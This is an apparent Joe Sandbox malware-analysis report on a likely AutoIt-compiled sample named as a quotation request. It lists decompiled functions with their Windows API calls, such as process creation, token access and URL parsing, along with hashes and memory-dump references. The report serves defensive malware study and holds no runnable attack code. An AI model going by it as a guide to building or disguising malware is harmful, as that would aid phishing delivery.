Instruction Fuzzy Hash: 7B115E75605315DBE3208F90D808F97BBBCEB00B00F00856AE6DAD6040DBF5E9499FA1

Function 01006FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 01006FDB

Part of subcall function 010076C2: __fltout2.LIBCMT ref: 010076EB

__cftog_l.LIBCMT ref: 01007001
__cftoe_l.LIBCMT ref: 01007033

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 2905b226278cd9e2e9f3127549766783849234290b2adebc4edb445b27a47b27
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: B5017E3604014EFBEF139E88CC05CED3F66BB28250F488555FA98580B0C23BE5B1AB81

Function 0105B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0105B2E4
ScreenToClient.USER32(?,?), ref: 0105B2FC
ScreenToClient.USER32(?,?), ref: 0105B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0105B33B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 87b43ae2680569cee3aeaf3cb90912b351cceb10614ba4ed1fcf3f4dd2b8cd35
Instruction ID: 8261d0b2325986b9a98b5a0ae69aafd064608d22dd1c93b9f986bcdc34f72656
Opcode Fuzzy Hash: 87b43ae2680569cee3aeaf3cb90912b351cceb10614ba4ed1fcf3f4dd2b8cd35
Instruction Fuzzy Hash: 491144B9D0020AEFDB51DFA9C4849EEBBF9FF08210F108156E954E3214D735AA558F60

Function 0105B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0105B644
_memset.LIBCMT ref: 0105B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01096F20,01096F64), ref: 0105B682
CloseHandle.KERNEL32 ref: 0105B694

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 9182c21723925d79c2525706431feaad014d06a1d47c3e15c2d2fbec9a2fb220
Instruction ID: 2dc6468220e9b1827839338a8bc29ee63f0f69194308ac484492d128392bd077
Opcode Fuzzy Hash: 9182c21723925d79c2525706431feaad014d06a1d47c3e15c2d2fbec9a2fb220
Instruction Fuzzy Hash: 76F05EB25403047AF7202765AC36FBB3A9CFB09395F404020BB88E5196D77F580097A8

Function 01036BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 01036BE6

Part of subcall function 010376C4: _memset.LIBCMT ref: 010376F9

_memmove.LIBCMT ref: 01036C09
_memset.LIBCMT ref: 01036C16
LeaveCriticalSection.KERNEL32(?), ref: 01036C26

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 2bd287d405562da43b0ff6b27cf61ef700679d3430a9a2510ef583a9fe879b44
Instruction ID: b6aec92f8d32ce27fa58234310bd78398a8923f713942b6b1f2338738ca8995b
Opcode Fuzzy Hash: 2bd287d405562da43b0ff6b27cf61ef700679d3430a9a2510ef583a9fe879b44
Instruction Fuzzy Hash: 89F0547A100205ABCF016F55DC84A8ABB29EF45360F04C051FE099E226CB35E811DBB4

Function 0105BD1C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FD134D
Part of subcall function 00FD12F3: SelectObject.GDI32(?,00000000), ref: 00FD135C
Part of subcall function 00FD12F3: BeginPath.GDI32(?), ref: 00FD1373
Part of subcall function 00FD12F3: SelectObject.GDI32(?,00000000), ref: 00FD139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0105BD40
LineTo.GDI32(00000000,?,?), ref: 0105BD4D
EndPath.GDI32(00000000), ref: 0105BD5D
StrokePath.GDI32(00000000), ref: 0105BD6B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7ba896fd013eb2ad5d7d7353131c597df3869dbd70a8481326e3a3777f613bc5
Instruction ID: e5a744284678cd7b771aed224b4dae13f291e3fe532934d90e3658030ac23cab
Opcode Fuzzy Hash: 7ba896fd013eb2ad5d7d7353131c597df3869dbd70a8481326e3a3777f613bc5
Instruction Fuzzy Hash: F7F0BE3100125ABBDB222F55AC0DFCF3F99BF06311F084041FA90650D1877E1650CBA5

Function 00FD2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FD2231
SetTextColor.GDI32(?,000000FF), ref: 00FD223B
SetBkMode.GDI32(?,00000001), ref: 00FD2250
GetStockObject.GDI32(00000005), ref: 00FD2258
GetWindowDC.USER32(?,00000000), ref: 0100BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0100BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0100BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0100BEC2
GetPixel.GDI32(00000000,?,?), ref: 0100BEE2
ReleaseDC.USER32(?,00000000), ref: 0100BEED

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 13d5ce910927cd83229577e02de1f230bcc7c61d8cc34c6b06925b5dacb463f4
Instruction ID: 48d28528748cc687d6a73b5f638d8fb6c84152e832fc8808b40eed0aa917152c
Opcode Fuzzy Hash: 13d5ce910927cd83229577e02de1f230bcc7c61d8cc34c6b06925b5dacb463f4
Instruction Fuzzy Hash: F9E03932504245AAEB625F68E80DBDA3F11EB16336F0483A6FBA9580E5C77A4580DB12

Function 01028712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0102871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,010282E6), ref: 01028722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010282E6), ref: 0102872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,010282E6), ref: 01028736

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: d45c60f7df67df7a28cf49653162ea179a76d613c7099fee8b4c374e98e8c3b2
Instruction ID: f2fb0aa587e2e2f9376d1fca6c8b6441049fe13b0a0101d7eb3ee6f434a003b5
Opcode Fuzzy Hash: d45c60f7df67df7a28cf49653162ea179a76d613c7099fee8b4c374e98e8c3b2
Instruction Fuzzy Hash: 4BE04F766113229BD7705EB45D0CB573BE8EF50791F048858F2C5CA084D62D80518750

Function 01011D5D Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 01011D5D
GetDC.USER32(00000000), ref: 01011D67
GetDeviceCaps.GDI32(00000000,0000000C), ref: 01011D87
ReleaseDC.USER32(?), ref: 01011DA8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a7719d11cde8fdc8975a591918a68f8bebe3fde636e4a031c7d0c1780ebeeda9
Instruction ID: 92526254c79afbe1fc3d5e127434ea6ebbea9fab1e3bb54cff8880befdcfaa87
Opcode Fuzzy Hash: a7719d11cde8fdc8975a591918a68f8bebe3fde636e4a031c7d0c1780ebeeda9
Instruction Fuzzy Hash: 66E0E575800206EFCF116FB0D80865E7BB2AB4C351F148016F99A97214DB7D8141AF50

Function 01011D71 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 01011D71
GetDC.USER32(00000000), ref: 01011D7B
GetDeviceCaps.GDI32(00000000,0000000C), ref: 01011D87
ReleaseDC.USER32(?), ref: 01011DA8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7cde9147826a2a35f3d76422bd81d4af5fa87da9aec8d7b17c79bbac11a21559
Instruction ID: 27868876b6aa06627e1608a6e1dd2ca672cf0c6053258b64535ac4f66fcca5f9
Opcode Fuzzy Hash: 7cde9147826a2a35f3d76422bd81d4af5fa87da9aec8d7b17c79bbac11a21559
Instruction Fuzzy Hash: 55E0E575800206AFCF215FB0C80865E7BB2AB4C351F148015F99997210DB7D9141AF50

Function 0102B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0102B4BE

Strings

Container, xrefs: 0102B43B
AutoIt3GUI, xrefs: 0102B436

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 35a71cb0b54e3995096e0af9ce9dc36be5d708bac244e94c85dc79b68f53e330
Instruction ID: 1500c06b7ad025ed92ac81360c37c5ad3f0b156adacd3e520531ab80d944b38f
Opcode Fuzzy Hash: 35a71cb0b54e3995096e0af9ce9dc36be5d708bac244e94c85dc79b68f53e330
Instruction Fuzzy Hash: 6E915970600611AFDB54DF68C884B6ABBE9FF49710F20856DE98ACF6A1DB71E841CB50

Function 0103AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

__wcsnicmp.LIBCMT ref: 0103B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0103B0F6

Strings

LPT, xrefs: 0103B027

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: ac8a3d6ed2d92c185a88a277fab444b7ac2ebf3fbb2dd2ac35684e55e69bd774
Instruction ID: b3c5b00f08ab8f6b92416826cbdda3d4a6918ec1fbf23213e72e564cf8442470
Opcode Fuzzy Hash: ac8a3d6ed2d92c185a88a277fab444b7ac2ebf3fbb2dd2ac35684e55e69bd774
Instruction Fuzzy Hash: DD61B271E00219AFCB14EF98C891EAEB7F9EF48714F44409AF996AB351D774AE40CB50

Function 00FE2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FE2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00FE2981

Strings

@, xrefs: 00FE2975

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a814185717c1d819b000da3ec4b0fa4f0ade0ba7f52399d9eafc10abc06ec80e
Instruction ID: 28d5bf32084756cdbc1946fe3f9f5e9eac86869f0c97d1566ecebe1905e448ac
Opcode Fuzzy Hash: a814185717c1d819b000da3ec4b0fa4f0ade0ba7f52399d9eafc10abc06ec80e
Instruction Fuzzy Hash: 685166724087489BD320EF50DC86BAFBBF8FB85340F85884EF2D881195DB758529DB66

Function 01039734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FD4F0B: __fread_nolock.LIBCMT ref: 00FD4F29

_wcscmp.LIBCMT ref: 01039824
_wcscmp.LIBCMT ref: 01039837

Strings

FILE, xrefs: 01039770

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: f55e06e08dc296587a336f80678be59339d89b4ec74b29a6a6094aeb456f621d
Instruction ID: 4b5e4e7643b719b8a33fe781c63a10fb33261be6c3f1717ecc9d8a07e647ff8c
Opcode Fuzzy Hash: f55e06e08dc296587a336f80678be59339d89b4ec74b29a6a6094aeb456f621d
Instruction Fuzzy Hash: DE41C571A0020ABBDF219BA4CC45FEFBBBDEFC5714F00006AF944A7290D6B5A9049B61

Function 0104258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010425D4

Strings

|, xrefs: 010425A5

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 883e48a927f8a978699aedb6072ef15ff8eebf760638ffd210d1b4607abe7fd9
Instruction ID: 3a692b65a2e415633c06a3a5eb49cd756b3344bf421f6c1b27436418e9389915
Opcode Fuzzy Hash: 883e48a927f8a978699aedb6072ef15ff8eebf760638ffd210d1b4607abe7fd9
Instruction Fuzzy Hash: 16315DB1900219EBCF01EFA5DC85EEEBFB9FF08340F04006AF954AA261EB355955DB50

Function 01057A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 01057B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01057B76

Strings

', xrefs: 01057ACA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 7ed050a88dee7a39b964c4d09496f2fecebb02adcdb66b7f1b0c0c95acd401c1
Instruction ID: 5cb2b737feffa5e3f3d0db2810c55fa47c7bb96803df1239d6e5437eb34abb6a
Opcode Fuzzy Hash: 7ed050a88dee7a39b964c4d09496f2fecebb02adcdb66b7f1b0c0c95acd401c1
Instruction Fuzzy Hash: A8410A74A0130A9FDB54CFA9C981BDABBF9FB48300F50016AEE44AB346D771A951DF90

Function 01056A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 01056B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01056B53

Strings

static, xrefs: 01056AB3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e84408ac4bdacf981605322d4348089470d978ccf33756f7ce00b25fccc4edd0
Instruction ID: 92d820556a7694cb3d8e8b50023602b456eb12d6c3fcc4d43abc5737c2d0b3be
Opcode Fuzzy Hash: e84408ac4bdacf981605322d4348089470d978ccf33756f7ce00b25fccc4edd0
Instruction Fuzzy Hash: 6331BE71200604AEEB519F69CC90BFB77F9FF48720F50861AFDE587190DA36A881DB60

Function 010328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01032911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0103294C

Strings

0, xrefs: 0103290A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 4d3e8fd84b2452a0ba3f66487e1856608f532988072fcff7d6b0d031f7e160b7
Instruction ID: 1f52971f2866b05bd12b1b26b90779ba8590e7648a9bea48690971eff7160572
Opcode Fuzzy Hash: 4d3e8fd84b2452a0ba3f66487e1856608f532988072fcff7d6b0d031f7e160b7
Instruction Fuzzy Hash: A631BD31A00309ABEB65CE5CCC85BAEBFECEF85390F14009AEAC5A61A1DB749540CB51

Function 010439E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 01043A66

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Strings

, $, xrefs: 01043AA6
AUTOITCALLVARIABLE%d, xrefs: 01043A58

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: df724d04ec94fb5ce2b813c8387c33f75f2f756c02fa974a5bdc57783dd27e0d
